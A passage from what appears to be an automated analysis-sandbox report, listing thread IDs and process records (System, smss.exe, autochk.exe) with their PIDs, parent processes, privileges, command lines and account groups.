Thread: id = 218 os_tid = 0x144 Thread: id = 219 os_tid = 0x110 Thread: id = 220 os_tid = 0x3f0 Thread: id = 221 os_tid = 0x3ec Thread: id = 222 os_tid = 0x3e4 Thread: id = 223 os_tid = 0x3e0 Thread: id = 224 os_tid = 0x3d0 Thread: id = 225 os_tid = 0x3cc Thread: id = 226 os_tid = 0x398 Thread: id = 227 os_tid = 0x394 Thread: id = 228 os_tid = 0x384 Thread: id = 229 os_tid = 0x380 Thread: id = 230 os_tid = 0x368 Thread: id = 231 os_tid = 0x350 Thread: id = 232 os_tid = 0x33c Process: id = "20" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 233 os_tid = 0x8 Thread: id = 234 os_tid = 0x5c Thread: id = 235 os_tid = 0x3c Thread: id = 236 os_tid = 0x24 Thread: id = 237 os_tid = 0x9c Thread: id = 238 os_tid = 0x78 Thread: id = 239 os_tid = 0xc0 Thread: id = 240 os_tid = 0x28 Thread: id = 241 os_tid = 0x30 Thread: id = 242 os_tid = 0xc8 Thread: id = 243 os_tid = 0x44 Thread: id = 244 os_tid = 0x40 Thread: id = 245 os_tid = 0xb4 Thread: id = 246 os_tid = 0x4c Thread: id = 247 os_tid = 0x64 Thread: id = 248 os_tid = 0x80 Thread: id = 249 os_tid = 0xc4 Thread: id = 250 os_tid = 0xcc Thread: id = 251 os_tid = 0xd0 Thread: id = 252 os_tid = 0xb8 Thread: id = 253 os_tid = 0x34 Thread: id = 254 os_tid = 0xd4 Thread: id = 255 os_tid = 0xd8 Thread: id = 256 os_tid = 0xdc Thread: id = 258 os_tid = 0x60 Thread: id = 259 os_tid = 0x38 Thread: id = 261 os_tid = 0xe8 Thread: id = 262 os_tid = 0xf4 Process: id = "21" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2ccca000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 257 os_tid = 0xe4 Thread: id = 260 os_tid = 0xec Process: id = "22" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2c9e7000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 263 os_tid = 0xfc